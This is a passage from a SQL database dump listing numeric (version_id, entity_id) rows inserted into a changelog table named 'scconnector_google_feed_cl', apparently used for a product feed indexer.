(21410, 1157),
(21411, 1157),
(21412, 1157),
(21413, 1157),
(21414, 1157),
(21415, 1157),
(21416, 1157),
(21417, 1158),
(21418, 1158),
(21419, 1158),
(21420, 1158),
(21421, 1158),
(21422, 1158),
(21423, 1158),
(21424, 1159),
(21425, 1159),
(21426, 1159),
(21427, 1159),
(21428, 1159),
(21429, 1159),
(21430, 1159),
(21431, 1159),
(21432, 1159),
(21433, 1159),
(21434, 1159),
(21435, 1060),
(21436, 1061),
(21437, 1062),
(21438, 1063),
(21439, 1064),
(21440, 1065),
(21441, 1066),
(21442, 1067),
(21443, 1068),
(21444, 1069),
(21445, 1070),
(21446, 1071),
(21447, 1072),
(21448, 1073),
(21449, 1074),
(21450, 1075),
(21451, 1076),
(21452, 1077),
(21453, 1078),
(21454, 1079),
(21455, 1080),
(21456, 1081),
(21457, 1082),
(21458, 1083),
(21459, 1084),
(21460, 1085),
(21461, 1086),
(21462, 1087),
(21463, 1088),
(21464, 1089),
(21465, 1090),
(21466, 1091),
(21467, 1092),
(21468, 1093),
(21469, 1094),
(21470, 1095),
(21471, 1096),
(21472, 1097),
(21473, 1098),
(21474, 1099),
(21475, 1100),
(21476, 1101),
(21477, 1102),
(21478, 1103),
(21479, 1104),
(21480, 1105),
(21481, 1106),
(21482, 1107),
(21483, 1108),
(21484, 1109),
(21485, 1110),
(21486, 1111),
(21487, 1112),
(21488, 1113),
(21489, 1114),
(21490, 1115),
(21491, 1116),
(21492, 1117),
(21493, 1118),
(21494, 1119),
(21495, 1120),
(21496, 1121),
(21497, 1122),
(21498, 1123),
(21499, 1124),
(21500, 1125),
(21501, 1126),
(21502, 1127),
(21503, 1128),
(21504, 1129),
(21505, 1130),
(21506, 1131),
(21507, 1132),
(21508, 1133),
(21509, 1134),
(21510, 1135),
(21511, 1136),
(21512, 1137),
(21513, 1138),
(21514, 1139),
(21515, 1140),
(21516, 1141),
(21517, 1142),
(21518, 1143),
(21519, 1144),
(21520, 1145),
(21521, 1146),
(21522, 1147),
(21523, 1148),
(21524, 1149),
(21525, 1150),
(21526, 1151),
(21527, 1152),
(21528, 1153),
(21529, 1154),
(21530, 1155),
(21531, 1156),
(21532, 1157),
(21533, 1158),
(21534, 1159),
(21535, 1060),
(21536, 1060),
(21537, 1060),
(21538, 1060),
(21539, 1060),
(21540, 1060),
(21541, 1061),
(21542, 1061),
(21543, 1061),
(21544, 1061),
(21545, 1061),
(21546, 1061),
(21547, 1062),
(21548, 1062),
(21549, 1062),
(21550, 1062),
(21551, 1062),
(21552, 1062),
(21553, 1063),
(21554, 1063),
(21555, 1063),
(21556, 1063),
(21557, 1063),
(21558, 1063),
(21559, 1064),
(21560, 1064),
(21561, 1064),
(21562, 1064),
(21563, 1064),
(21564, 1064),
(21565, 1065),
(21566, 1065),
(21567, 1065),
(21568, 1065),
(21569, 1065),
(21570, 1065),
(21571, 1066),
(21572, 1066),
(21573, 1066),
(21574, 1066),
(21575, 1066),
(21576, 1066),
(21577, 1067),
(21578, 1067),
(21579, 1067),
(21580, 1067),
(21581, 1067),
(21582, 1067),
(21583, 1068),
(21584, 1068),
(21585, 1068),
(21586, 1068),
(21587, 1068),
(21588, 1068),
(21589, 1069),
(21590, 1069),
(21591, 1069),
(21592, 1069),
(21593, 1069),
(21594, 1069),
(21595, 1070),
(21596, 1070),
(21597, 1070),
(21598, 1070),
(21599, 1070),
(21600, 1070),
(21601, 1071),
(21602, 1071),
(21603, 1071),
(21604, 1071),
(21605, 1071),
(21606, 1071),
(21607, 1072),
(21608, 1072),
(21609, 1072),
(21610, 1072),
(21611, 1072),
(21612, 1072),
(21613, 1073),
(21614, 1073),
(21615, 1073),
(21616, 1073),
(21617, 1073),
(21618, 1073),
(21619, 1073),
(21620, 1073),
(21621, 1073),
(21622, 1074),
(21623, 1074),
(21624, 1074),
(21625, 1074),
(21626, 1074),
(21627, 1074),
(21628, 1075),
(21629, 1075),
(21630, 1075),
(21631, 1075),
(21632, 1075),
(21633, 1075),
(21634, 1076),
(21635, 1076),
(21636, 1076),
(21637, 1076),
(21638, 1076),
(21639, 1076),
(21640, 1077),
(21641, 1077),
(21642, 1077),
(21643, 1077),
(21644, 1077),
(21645, 1077),
(21646, 1078),
(21647, 1078),
(21648, 1078),
(21649, 1078),
(21650, 1078),
(21651, 1078),
(21652, 1079),
(21653, 1079),
(21654, 1079),
(21655, 1079),
(21656, 1079),
(21657, 1079),
(21658, 1080),
(21659, 1080),
(21660, 1080),
(21661, 1080),
(21662, 1080),
(21663, 1080),
(21664, 1081),
(21665, 1081),
(21666, 1081),
(21667, 1081),
(21668, 1081),
(21669, 1081),
(21670, 1082),
(21671, 1082),
(21672, 1082),
(21673, 1082),
(21674, 1082),
(21675, 1082),
(21676, 1083),
(21677, 1083),
(21678, 1083),
(21679, 1083),
(21680, 1083),
(21681, 1083),
(21682, 1084),
(21683, 1084),
(21684, 1084),
(21685, 1084),
(21686, 1084),
(21687, 1084),
(21688, 1085),
(21689, 1085),
(21690, 1085),
(21691, 1085),
(21692, 1085),
(21693, 1085),
(21694, 1086),
(21695, 1086),
(21696, 1086),
(21697, 1086),
(21698, 1086),
(21699, 1086),
(21700, 1087),
(21701, 1087),
(21702, 1087),
(21703, 1087),
(21704, 1087),
(21705, 1087),
(21706, 1088),
(21707, 1088),
(21708, 1088),
(21709, 1088),
(21710, 1088),
(21711, 1088),
(21712, 1089),
(21713, 1089),
(21714, 1089),
(21715, 1089),
(21716, 1089),
(21717, 1089),
(21718, 1089),
(21719, 1089),
(21720, 1089),
(21721, 1090),
(21722, 1090),
(21723, 1090),
(21724, 1090),
(21725, 1090),
(21726, 1090),
(21727, 1091),
(21728, 1091),
(21729, 1091),
(21730, 1091),
(21731, 1091),
(21732, 1091),
(21733, 1092),
(21734, 1092),
(21735, 1092),
(21736, 1092),
(21737, 1092),
(21738, 1092),
(21739, 1093),
(21740, 1093),
(21741, 1093),
(21742, 1093),
(21743, 1093),
(21744, 1093),
(21745, 1094),
(21746, 1094),
(21747, 1094),
(21748, 1094),
(21749, 1094),
(21750, 1094),
(21751, 1095),
(21752, 1095),
(21753, 1095),
(21754, 1095),
(21755, 1095),
(21756, 1095),
(21757, 1096),
(21758, 1096),
(21759, 1096),
(21760, 1096),
(21761, 1096),
(21762, 1096),
(21763, 1097),
(21764, 1097),
(21765, 1097),
(21766, 1097),
(21767, 1097),
(21768, 1097),
(21769, 1098),
(21770, 1098),
(21771, 1098),
(21772, 1098),
(21773, 1098),
(21774, 1098),
(21775, 1099),
(21776, 1099),
(21777, 1099),
(21778, 1099);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(21779, 1099),
(21780, 1099),
(21781, 1100),
(21782, 1100),
(21783, 1100),
(21784, 1100),
(21785, 1100),
(21786, 1100),
(21787, 1101),
(21788, 1101),
(21789, 1101),
(21790, 1101),
(21791, 1101),
(21792, 1101),
(21793, 1102),
(21794, 1102),
(21795, 1102),
(21796, 1102),
(21797, 1102),
(21798, 1102),
(21799, 1103),
(21800, 1103),
(21801, 1103),
(21802, 1103),
(21803, 1103),
(21804, 1103),
(21805, 1104),
(21806, 1104),
(21807, 1104),
(21808, 1104),
(21809, 1104),
(21810, 1104),
(21811, 1105),
(21812, 1105),
(21813, 1105),
(21814, 1105),
(21815, 1105),
(21816, 1105),
(21817, 1105),
(21818, 1105),
(21819, 1105),
(21820, 1106),
(21821, 1106),
(21822, 1106),
(21823, 1106),
(21824, 1106),
(21825, 1106),
(21826, 1107),
(21827, 1107),
(21828, 1107),
(21829, 1107),
(21830, 1107),
(21831, 1107),
(21832, 1108),
(21833, 1108),
(21834, 1108),
(21835, 1108),
(21836, 1108),
(21837, 1108),
(21838, 1109),
(21839, 1109),
(21840, 1109),
(21841, 1109),
(21842, 1109),
(21843, 1109),
(21844, 1110),
(21845, 1110),
(21846, 1110),
(21847, 1110),
(21848, 1110),
(21849, 1110),
(21850, 1111),
(21851, 1111),
(21852, 1111),
(21853, 1111),
(21854, 1111),
(21855, 1111),
(21856, 1112),
(21857, 1112),
(21858, 1112),
(21859, 1112),
(21860, 1112),
(21861, 1112),
(21862, 1113),
(21863, 1113),
(21864, 1113),
(21865, 1113),
(21866, 1113),
(21867, 1113),
(21868, 1114),
(21869, 1114),
(21870, 1114),
(21871, 1114),
(21872, 1114),
(21873, 1114),
(21874, 1115),
(21875, 1115),
(21876, 1115),
(21877, 1115),
(21878, 1115),
(21879, 1115),
(21880, 1116),
(21881, 1116),
(21882, 1116),
(21883, 1116),
(21884, 1116),
(21885, 1116),
(21886, 1117),
(21887, 1117),
(21888, 1117),
(21889, 1117),
(21890, 1117),
(21891, 1117),
(21892, 1118),
(21893, 1118),
(21894, 1118),
(21895, 1118),
(21896, 1118),
(21897, 1118),
(21898, 1119),
(21899, 1119),
(21900, 1119),
(21901, 1119),
(21902, 1119),
(21903, 1119),
(21904, 1120),
(21905, 1120),
(21906, 1120),
(21907, 1120),
(21908, 1120),
(21909, 1120),
(21910, 1121),
(21911, 1121),
(21912, 1121),
(21913, 1121),
(21914, 1121),
(21915, 1121),
(21916, 1121),
(21917, 1121),
(21918, 1121),
(21919, 1122),
(21920, 1122),
(21921, 1122),
(21922, 1122),
(21923, 1122),
(21924, 1122),
(21925, 1123),
(21926, 1123),
(21927, 1123),
(21928, 1123),
(21929, 1123),
(21930, 1123),
(21931, 1124),
(21932, 1124),
(21933, 1124),
(21934, 1124),
(21935, 1124),
(21936, 1124),
(21937, 1125),
(21938, 1125),
(21939, 1125),
(21940, 1125),
(21941, 1125),
(21942, 1125),
(21943, 1126),
(21944, 1126),
(21945, 1126),
(21946, 1126),
(21947, 1126),
(21948, 1126),
(21949, 1127),
(21950, 1127),
(21951, 1127),
(21952, 1127),
(21953, 1127),
(21954, 1127),
(21955, 1127),
(21956, 1127),
(21957, 1127),
(21958, 1128),
(21959, 1128),
(21960, 1128),
(21961, 1128),
(21962, 1128),
(21963, 1128),
(21964, 1129),
(21965, 1129),
(21966, 1129),
(21967, 1129),
(21968, 1129),
(21969, 1129),
(21970, 1130),
(21971, 1130),
(21972, 1130),
(21973, 1130),
(21974, 1130),
(21975, 1130),
(21976, 1131),
(21977, 1131),
(21978, 1131),
(21979, 1131),
(21980, 1131),
(21981, 1131),
(21982, 1132),
(21983, 1132),
(21984, 1132),
(21985, 1132),
(21986, 1132),
(21987, 1132),
(21988, 1133),
(21989, 1133),
(21990, 1133),
(21991, 1133),
(21992, 1133),
(21993, 1133),
(21994, 1134),
(21995, 1134),
(21996, 1134),
(21997, 1134),
(21998, 1134),
(21999, 1134),
(22000, 1135),
(22001, 1135),
(22002, 1135),
(22003, 1135),
(22004, 1135),
(22005, 1135),
(22006, 1136),
(22007, 1136),
(22008, 1136),
(22009, 1136),
(22010, 1136),
(22011, 1136),
(22012, 1137),
(22013, 1137),
(22014, 1137),
(22015, 1137),
(22016, 1137),
(22017, 1137),
(22018, 1138),
(22019, 1138),
(22020, 1138),
(22021, 1138),
(22022, 1138),
(22023, 1138),
(22024, 1139),
(22025, 1139),
(22026, 1139),
(22027, 1139),
(22028, 1139),
(22029, 1139),
(22030, 1140),
(22031, 1140),
(22032, 1140),
(22033, 1140),
(22034, 1140),
(22035, 1140),
(22036, 1141),
(22037, 1141),
(22038, 1141),
(22039, 1141),
(22040, 1141),
(22041, 1141),
(22042, 1142),
(22043, 1142),
(22044, 1142),
(22045, 1142),
(22046, 1142),
(22047, 1142),
(22048, 1143),
(22049, 1143),
(22050, 1143),
(22051, 1143),
(22052, 1143),
(22053, 1143),
(22054, 1143),
(22055, 1143),
(22056, 1143),
(22057, 1144),
(22058, 1144),
(22059, 1144),
(22060, 1144),
(22061, 1144),
(22062, 1144),
(22063, 1145),
(22064, 1145),
(22065, 1145),
(22066, 1145),
(22067, 1145),
(22068, 1145),
(22069, 1146),
(22070, 1146),
(22071, 1146),
(22072, 1146),
(22073, 1146),
(22074, 1146),
(22075, 1147),
(22076, 1147),
(22077, 1147),
(22078, 1147),
(22079, 1147),
(22080, 1147),
(22081, 1148),
(22082, 1148),
(22083, 1148),
(22084, 1148),
(22085, 1148),
(22086, 1148),
(22087, 1149),
(22088, 1149),
(22089, 1149),
(22090, 1149),
(22091, 1149),
(22092, 1149),
(22093, 1150),
(22094, 1150),
(22095, 1150),
(22096, 1150),
(22097, 1150),
(22098, 1150),
(22099, 1151),
(22100, 1151),
(22101, 1151),
(22102, 1151),
(22103, 1151),
(22104, 1151),
(22105, 1152),
(22106, 1152),
(22107, 1152),
(22108, 1152),
(22109, 1152),
(22110, 1152),
(22111, 1153),
(22112, 1153),
(22113, 1153),
(22114, 1153),
(22115, 1153),
(22116, 1153),
(22117, 1154),
(22118, 1154),
(22119, 1154),
(22120, 1154),
(22121, 1154),
(22122, 1154),
(22123, 1155),
(22124, 1155),
(22125, 1155),
(22126, 1155),
(22127, 1155),
(22128, 1155),
(22129, 1156),
(22130, 1156),
(22131, 1156),
(22132, 1156),
(22133, 1156),
(22134, 1156),
(22135, 1157),
(22136, 1157),
(22137, 1157),
(22138, 1157),
(22139, 1157),
(22140, 1157),
(22141, 1158),
(22142, 1158),
(22143, 1158),
(22144, 1158),
(22145, 1158),
(22146, 1158),
(22147, 1159),
(22148, 1159),
(22149, 1159),
(22150, 1159),
(22151, 1159),
(22152, 1159),
(22153, 1159),
(22154, 1159),
(22155, 1159),
(22156, 1060),
(22157, 1060),
(22158, 1061),
(22159, 1061),
(22160, 1062),
(22161, 1062),
(22162, 1063),
(22163, 1063),
(22164, 1064),
(22165, 1064),
(22166, 1065),
(22167, 1065),
(22168, 1066),
(22169, 1066),
(22170, 1067),
(22171, 1067),
(22172, 1068),
(22173, 1068),
(22174, 1069),
(22175, 1069),
(22176, 1070),
(22177, 1070),
(22178, 1071),
(22179, 1071),
(22180, 1072),
(22181, 1072),
(22182, 1073),
(22183, 1074),
(22184, 1074),
(22185, 1075),
(22186, 1075),
(22187, 1076),
(22188, 1076),
(22189, 1077),
(22190, 1077),
(22191, 1078),
(22192, 1078),
(22193, 1079),
(22194, 1079),
(22195, 1080),
(22196, 1080),
(22197, 1081),
(22198, 1081),
(22199, 1082),
(22200, 1082),
(22201, 1083),
(22202, 1083),
(22203, 1084),
(22204, 1084),
(22205, 1085),
(22206, 1085),
(22207, 1086),
(22208, 1086),
(22209, 1087),
(22210, 1087),
(22211, 1088),
(22212, 1088),
(22213, 1089),
(22214, 1090),
(22215, 1090),
(22216, 1091),
(22217, 1091),
(22218, 1092),
(22219, 1092),
(22220, 1093),
(22221, 1093),
(22222, 1094),
(22223, 1094),
(22224, 1095),
(22225, 1095),
(22226, 1096),
(22227, 1096),
(22228, 1097),
(22229, 1097),
(22230, 1098),
(22231, 1098),
(22232, 1099),
(22233, 1099),
(22234, 1100),
(22235, 1100),
(22236, 1101),
(22237, 1101),
(22238, 1102),
(22239, 1102),
(22240, 1103),
(22241, 1103),
(22242, 1104),
(22243, 1104),
(22244, 1105),
(22245, 1106),
(22246, 1106),
(22247, 1107),
(22248, 1107),
(22249, 1108),
(22250, 1108),
(22251, 1109),
(22252, 1109),
(22253, 1110),
(22254, 1110),
(22255, 1111),
(22256, 1111),
(22257, 1112),
(22258, 1112),
(22259, 1113),
(22260, 1113),
(22261, 1114),
(22262, 1114),
(22263, 1115),
(22264, 1115),
(22265, 1116),
(22266, 1116),
(22267, 1117),
(22268, 1117),
(22269, 1118),
(22270, 1118),
(22271, 1119),
(22272, 1119),
(22273, 1120),
(22274, 1120),
(22275, 1121),
(22276, 1122),
(22277, 1122),
(22278, 1123),
(22279, 1123),
(22280, 1124),
(22281, 1124),
(22282, 1125),
(22283, 1125),
(22284, 1126),
(22285, 1126),
(22286, 1127),
(22287, 1128),
(22288, 1128),
(22289, 1129),
(22290, 1129),
(22291, 1130),
(22292, 1130),
(22293, 1131),
(22294, 1131),
(22295, 1132),
(22296, 1132),
(22297, 1133),
(22298, 1133),
(22299, 1134),
(22300, 1134),
(22301, 1135),
(22302, 1135),
(22303, 1136),
(22304, 1136),
(22305, 1137),
(22306, 1137),
(22307, 1138),
(22308, 1138),
(22309, 1139),
(22310, 1139),
(22311, 1140),
(22312, 1140),
(22313, 1141),
(22314, 1141),
(22315, 1142),
(22316, 1142),
(22317, 1143),
(22318, 1144),
(22319, 1144),
(22320, 1145),
(22321, 1145),
(22322, 1146),
(22323, 1146),
(22324, 1147),
(22325, 1147),
(22326, 1148),
(22327, 1148),
(22328, 1149),
(22329, 1149),
(22330, 1150),
(22331, 1150),
(22332, 1151),
(22333, 1151),
(22334, 1152),
(22335, 1152),
(22336, 1153),
(22337, 1153),
(22338, 1154),
(22339, 1154),
(22340, 1155),
(22341, 1155),
(22342, 1156),
(22343, 1156),
(22344, 1157),
(22345, 1157),
(22346, 1158),
(22347, 1158),
(22348, 1159),
(22349, 1160),
(22350, 1161),
(22351, 1162),
(22352, 1163),
(22353, 1164),
(22354, 1165),
(22355, 1166),
(22356, 1167),
(22357, 1168),
(22358, 1169),
(22359, 1170),
(22360, 1171),
(22361, 1172),
(22362, 1173),
(22363, 1174),
(22364, 1175),
(22365, 1176),
(22366, 1177),
(22367, 1178),
(22368, 1179),
(22369, 1180),
(22370, 1181),
(22371, 1182),
(22372, 1183),
(22373, 1184),
(22374, 1185),
(22375, 1186),
(22376, 1187),
(22377, 1188),
(22378, 1189),
(22379, 1190),
(22380, 1191),
(22381, 1192),
(22382, 1193),
(22383, 1194),
(22384, 1195),
(22385, 1196),
(22386, 1197),
(22387, 1198),
(22388, 1199),
(22389, 1200),
(22390, 1201),
(22391, 1202),
(22392, 1203),
(22393, 1204),
(22394, 1205),
(22395, 1206),
(22396, 1207),
(22397, 1208),
(22398, 1209),
(22399, 1210),
(22400, 1211),
(22401, 1212),
(22402, 1213),
(22403, 1214),
(22404, 1215),
(22405, 1216),
(22406, 1217),
(22407, 1218),
(22408, 1219),
(22409, 1220),
(22410, 1221),
(22411, 1222),
(22412, 1223),
(22413, 1224),
(22414, 1225),
(22415, 1226),
(22416, 1227),
(22417, 1228),
(22418, 1229),
(22419, 1230),
(22420, 1231),
(22421, 1232),
(22422, 1233),
(22423, 1234),
(22424, 1235),
(22425, 1236),
(22426, 1237),
(22427, 1238),
(22428, 1239),
(22429, 1240),
(22430, 1241),
(22431, 1242),
(22432, 1243),
(22433, 1244),
(22434, 1245),
(22435, 1246),
(22436, 1247),
(22437, 1248),
(22438, 1249),
(22439, 1250),
(22440, 1251),
(22441, 1252),
(22442, 1253),
(22443, 1254),
(22444, 1255),
(22445, 1256),
(22446, 1257),
(22447, 1258),
(22448, 1259),
(22449, 1160),
(22450, 1161),
(22451, 1161),
(22452, 1161),
(22453, 1162),
(22454, 1163),
(22455, 1164),
(22456, 1164),
(22457, 1164),
(22458, 1165),
(22459, 1166),
(22460, 1167),
(22461, 1167),
(22462, 1167),
(22463, 1168),
(22464, 1169),
(22465, 1170),
(22466, 1170),
(22467, 1170),
(22468, 1171),
(22469, 1172),
(22470, 1173),
(22471, 1173),
(22472, 1173),
(22473, 1174),
(22474, 1175),
(22475, 1175),
(22476, 1175),
(22477, 1176),
(22478, 1177),
(22479, 1177),
(22480, 1177),
(22481, 1178),
(22482, 1179),
(22483, 1180),
(22484, 1180),
(22485, 1180),
(22486, 1181),
(22487, 1182),
(22488, 1183),
(22489, 1183),
(22490, 1183),
(22491, 1184),
(22492, 1185),
(22493, 1186),
(22494, 1186),
(22495, 1186),
(22496, 1187),
(22497, 1188),
(22498, 1189),
(22499, 1189),
(22500, 1189),
(22501, 1190),
(22502, 1191),
(22503, 1191),
(22504, 1191),
(22505, 1192),
(22506, 1192),
(22507, 1193),
(22508, 1194),
(22509, 1195),
(22510, 1195),
(22511, 1196),
(22512, 1197),
(22513, 1198),
(22514, 1198),
(22515, 1199),
(22516, 1200),
(22517, 1201),
(22518, 1201),
(22519, 1202),
(22520, 1203),
(22521, 1204),
(22522, 1204),
(22523, 1205),
(22524, 1206),
(22525, 1207),
(22526, 1207),
(22527, 1208),
(22528, 1208),
(22529, 1209),
(22530, 1210),
(22531, 1211),
(22532, 1211),
(22533, 1212),
(22534, 1213),
(22535, 1214),
(22536, 1214),
(22537, 1215),
(22538, 1216),
(22539, 1217),
(22540, 1217),
(22541, 1218),
(22542, 1219),
(22543, 1220),
(22544, 1220),
(22545, 1221),
(22546, 1222),
(22547, 1223),
(22548, 1223),
(22549, 1224),
(22550, 1225),
(22551, 1225),
(22552, 1225),
(22553, 1226),
(22554, 1227),
(22555, 1228),
(22556, 1228),
(22557, 1228),
(22558, 1229),
(22559, 1230),
(22560, 1231),
(22561, 1231),
(22562, 1231),
(22563, 1232),
(22564, 1233),
(22565, 1233),
(22566, 1233),
(22567, 1234),
(22568, 1235),
(22569, 1236),
(22570, 1236),
(22571, 1236),
(22572, 1237),
(22573, 1238),
(22574, 1239),
(22575, 1239),
(22576, 1239),
(22577, 1240),
(22578, 1241),
(22579, 1242),
(22580, 1242),
(22581, 1242),
(22582, 1243),
(22583, 1244),
(22584, 1245),
(22585, 1245),
(22586, 1245),
(22587, 1246),
(22588, 1247),
(22589, 1248),
(22590, 1248),
(22591, 1248),
(22592, 1249),
(22593, 1249),
(22594, 1249),
(22595, 1250),
(22596, 1251),
(22597, 1252),
(22598, 1252),
(22599, 1252),
(22600, 1253),
(22601, 1254),
(22602, 1255),
(22603, 1255),
(22604, 1255),
(22605, 1256),
(22606, 1257),
(22607, 1258),
(22608, 1258),
(22609, 1258),
(22610, 1259),
(22611, 1160),
(22612, 1160),
(22613, 1160),
(22614, 1160),
(22615, 1160),
(22616, 1160),
(22617, 1160),
(22618, 1161),
(22619, 1161),
(22620, 1161),
(22621, 1161),
(22622, 1161),
(22623, 1161),
(22624, 1161),
(22625, 1162),
(22626, 1162),
(22627, 1162),
(22628, 1162),
(22629, 1162),
(22630, 1162),
(22631, 1162),
(22632, 1163),
(22633, 1163),
(22634, 1163),
(22635, 1163),
(22636, 1163),
(22637, 1163),
(22638, 1163),
(22639, 1164),
(22640, 1164),
(22641, 1164),
(22642, 1164),
(22643, 1164),
(22644, 1164),
(22645, 1164),
(22646, 1165),
(22647, 1165),
(22648, 1165),
(22649, 1165),
(22650, 1165),
(22651, 1165),
(22652, 1165),
(22653, 1166),
(22654, 1166),
(22655, 1166),
(22656, 1166),
(22657, 1166),
(22658, 1166),
(22659, 1166),
(22660, 1167),
(22661, 1167),
(22662, 1167),
(22663, 1167),
(22664, 1167),
(22665, 1167),
(22666, 1167),
(22667, 1168),
(22668, 1168),
(22669, 1168),
(22670, 1168),
(22671, 1168),
(22672, 1168),
(22673, 1168),
(22674, 1169),
(22675, 1169),
(22676, 1169),
(22677, 1169),
(22678, 1169),
(22679, 1169),
(22680, 1169),
(22681, 1170),
(22682, 1170),
(22683, 1170),
(22684, 1170),
(22685, 1170),
(22686, 1170),
(22687, 1170),
(22688, 1171),
(22689, 1171),
(22690, 1171),
(22691, 1171),
(22692, 1171),
(22693, 1171),
(22694, 1171),
(22695, 1172),
(22696, 1172),
(22697, 1172),
(22698, 1172),
(22699, 1172),
(22700, 1172),
(22701, 1172),
(22702, 1173),
(22703, 1173),
(22704, 1173),
(22705, 1173),
(22706, 1173),
(22707, 1173),
(22708, 1173),
(22709, 1174),
(22710, 1174),
(22711, 1174),
(22712, 1174),
(22713, 1174),
(22714, 1174),
(22715, 1174),
(22716, 1175),
(22717, 1175),
(22718, 1175),
(22719, 1175),
(22720, 1175),
(22721, 1175),
(22722, 1175),
(22723, 1175),
(22724, 1175),
(22725, 1175),
(22726, 1175),
(22727, 1176),
(22728, 1176),
(22729, 1176),
(22730, 1176),
(22731, 1176),
(22732, 1176),
(22733, 1176),
(22734, 1177),
(22735, 1177),
(22736, 1177),
(22737, 1177),
(22738, 1177),
(22739, 1177),
(22740, 1177),
(22741, 1178),
(22742, 1178),
(22743, 1178),
(22744, 1178),
(22745, 1178),
(22746, 1178),
(22747, 1178),
(22748, 1179),
(22749, 1179),
(22750, 1179),
(22751, 1179),
(22752, 1179),
(22753, 1179),
(22754, 1179),
(22755, 1180),
(22756, 1180),
(22757, 1180),
(22758, 1180),
(22759, 1180),
(22760, 1180),
(22761, 1180),
(22762, 1181),
(22763, 1181),
(22764, 1181),
(22765, 1181),
(22766, 1181),
(22767, 1181),
(22768, 1181),
(22769, 1182),
(22770, 1182),
(22771, 1182),
(22772, 1182),
(22773, 1182),
(22774, 1182),
(22775, 1182),
(22776, 1183),
(22777, 1183),
(22778, 1183),
(22779, 1183),
(22780, 1183),
(22781, 1183),
(22782, 1183),
(22783, 1184),
(22784, 1184),
(22785, 1184),
(22786, 1184),
(22787, 1184),
(22788, 1184),
(22789, 1184),
(22790, 1185),
(22791, 1185),
(22792, 1185),
(22793, 1185),
(22794, 1185),
(22795, 1185),
(22796, 1185),
(22797, 1186),
(22798, 1186),
(22799, 1186),
(22800, 1186),
(22801, 1186),
(22802, 1186),
(22803, 1186),
(22804, 1187),
(22805, 1187),
(22806, 1187),
(22807, 1187),
(22808, 1187),
(22809, 1187),
(22810, 1187),
(22811, 1188),
(22812, 1188),
(22813, 1188),
(22814, 1188),
(22815, 1188),
(22816, 1188),
(22817, 1188),
(22818, 1189),
(22819, 1189),
(22820, 1189),
(22821, 1189),
(22822, 1189),
(22823, 1189),
(22824, 1189),
(22825, 1190),
(22826, 1190),
(22827, 1190),
(22828, 1190),
(22829, 1190),
(22830, 1190),
(22831, 1190),
(22832, 1191),
(22833, 1191),
(22834, 1191),
(22835, 1191),
(22836, 1191),
(22837, 1191),
(22838, 1191),
(22839, 1191),
(22840, 1191),
(22841, 1191),
(22842, 1191),
(22843, 1192),
(22844, 1192),
(22845, 1192),
(22846, 1192),
(22847, 1192),
(22848, 1192),
(22849, 1192),
(22850, 1193),
(22851, 1193),
(22852, 1193),
(22853, 1193),
(22854, 1193),
(22855, 1193),
(22856, 1193),
(22857, 1194),
(22858, 1194),
(22859, 1194),
(22860, 1194),
(22861, 1194),
(22862, 1194),
(22863, 1194),
(22864, 1195),
(22865, 1195),
(22866, 1195),
(22867, 1195),
(22868, 1195),
(22869, 1195),
(22870, 1195),
(22871, 1196),
(22872, 1196),
(22873, 1196),
(22874, 1196),
(22875, 1196),
(22876, 1196),
(22877, 1196),
(22878, 1197),
(22879, 1197),
(22880, 1197),
(22881, 1197),
(22882, 1197),
(22883, 1197),
(22884, 1197),
(22885, 1198),
(22886, 1198),
(22887, 1198),
(22888, 1198),
(22889, 1198),
(22890, 1198),
(22891, 1198),
(22892, 1199),
(22893, 1199),
(22894, 1199),
(22895, 1199),
(22896, 1199),
(22897, 1199),
(22898, 1199),
(22899, 1200),
(22900, 1200),
(22901, 1200),
(22902, 1200),
(22903, 1200),
(22904, 1200),
(22905, 1200),
(22906, 1201),
(22907, 1201),
(22908, 1201),
(22909, 1201),
(22910, 1201),
(22911, 1201),
(22912, 1201),
(22913, 1202),
(22914, 1202),
(22915, 1202),
(22916, 1202),
(22917, 1202),
(22918, 1202),
(22919, 1202),
(22920, 1203),
(22921, 1203),
(22922, 1203),
(22923, 1203),
(22924, 1203),
(22925, 1203),
(22926, 1203),
(22927, 1204),
(22928, 1204),
(22929, 1204),
(22930, 1204),
(22931, 1204),
(22932, 1204),
(22933, 1204),
(22934, 1205),
(22935, 1205),
(22936, 1205),
(22937, 1205),
(22938, 1205),
(22939, 1205),
(22940, 1205),
(22941, 1206),
(22942, 1206),
(22943, 1206),
(22944, 1206),
(22945, 1206),
(22946, 1206),
(22947, 1206),
(22948, 1207),
(22949, 1207),
(22950, 1207),
(22951, 1207),
(22952, 1207),
(22953, 1207),
(22954, 1207),
(22955, 1207),
(22956, 1207),
(22957, 1207),
(22958, 1207),
(22959, 1208),
(22960, 1208),
(22961, 1208),
(22962, 1208),
(22963, 1208),
(22964, 1208),
(22965, 1208),
(22966, 1209),
(22967, 1209),
(22968, 1209),
(22969, 1209),
(22970, 1209),
(22971, 1209),
(22972, 1209),
(22973, 1210),
(22974, 1210),
(22975, 1210),
(22976, 1210),
(22977, 1210),
(22978, 1210),
(22979, 1210),
(22980, 1211),
(22981, 1211),
(22982, 1211),
(22983, 1211),
(22984, 1211),
(22985, 1211),
(22986, 1211),
(22987, 1212),
(22988, 1212),
(22989, 1212),
(22990, 1212),
(22991, 1212),
(22992, 1212),
(22993, 1212),
(22994, 1213),
(22995, 1213),
(22996, 1213),
(22997, 1213),
(22998, 1213),
(22999, 1213),
(23000, 1213),
(23001, 1214),
(23002, 1214),
(23003, 1214),
(23004, 1214),
(23005, 1214),
(23006, 1214),
(23007, 1214),
(23008, 1215),
(23009, 1215),
(23010, 1215),
(23011, 1215),
(23012, 1215),
(23013, 1215),
(23014, 1215),
(23015, 1216),
(23016, 1216),
(23017, 1216),
(23018, 1216),
(23019, 1216),
(23020, 1216),
(23021, 1216),
(23022, 1217),
(23023, 1217),
(23024, 1217),
(23025, 1217),
(23026, 1217),
(23027, 1217),
(23028, 1217),
(23029, 1218),
(23030, 1218),
(23031, 1218),
(23032, 1218),
(23033, 1218),
(23034, 1218),
(23035, 1218),
(23036, 1219),
(23037, 1219),
(23038, 1219),
(23039, 1219),
(23040, 1219),
(23041, 1219),
(23042, 1219),
(23043, 1220),
(23044, 1220),
(23045, 1220),
(23046, 1220),
(23047, 1220),
(23048, 1220),
(23049, 1220),
(23050, 1221),
(23051, 1221),
(23052, 1221),
(23053, 1221),
(23054, 1221),
(23055, 1221),
(23056, 1221),
(23057, 1222),
(23058, 1222),
(23059, 1222),
(23060, 1222),
(23061, 1222),
(23062, 1222),
(23063, 1222),
(23064, 1223),
(23065, 1223),
(23066, 1223),
(23067, 1223),
(23068, 1223),
(23069, 1223),
(23070, 1223),
(23071, 1223),
